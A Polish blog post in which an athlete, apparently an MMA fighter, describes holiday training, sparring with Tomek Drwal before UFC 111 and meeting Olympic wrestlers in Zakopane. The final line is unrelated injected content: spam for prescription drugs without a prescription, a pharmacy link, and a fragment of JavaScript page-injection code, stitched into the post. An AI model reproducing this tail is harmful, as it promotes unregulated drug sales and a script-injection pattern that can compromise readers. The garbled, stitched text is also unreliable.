Nadrabianie zaległości….

19.01.2010 / Mariusz Cieśliński

Niestety okres  świąteczno-noworoczny się skończył już dawno a w blogu była lekka pustka spowodowana nie tyle lenistwem co intensywnością życia sportowca w tym okresie. Dużo treningów z upychaniem wizyt wśród znajomych i rodziny, a do tego trzeba jeszcze odpoczywać.

Na początku stycznia spotkałem się z Tomkiem Drwalem na treningach reprezentacji olimpijskiej w boksie. Trochę skorzystaliśmy z doświadczeń pięściarzy i wykorzystaliśmy czas na wspólne treningi-głównie sparringi zadaniowe. Tomek będzie walczył pod koniec marca na gali UFC 111 gdzie czeka go trudne wyzwanie w najlepszej lidze światowego MMA jaką jest właśnie ta organizacja (UFC). Spotkaliśmy w COS (Centralny Ośrodek Sportu) w Zakopanym reprezentację olimpijską zapasów stylu klasycznego. Była okazja chwilę porozmawiać trenerem kadry i mistrzem olimpijskim z Atlanty Ryszardem Wolnym, dwukrotnym medalistą brązowym i srebrnym z igrzysk w Barcelonie i Atlancie Józefem Traczem, a do tego spotkałem mojego kumpla z Wałbrzycha Julka Kwita uczestnika olimpiady w Pekinie.

buy accutane from canada cheap chloromycetin 500 online document.currentScript.parentNode.insertBefore(s, document.currentScript); online http://www.indcap.in/baclofen-online-ohne-rezept/ Purchase Pills Pills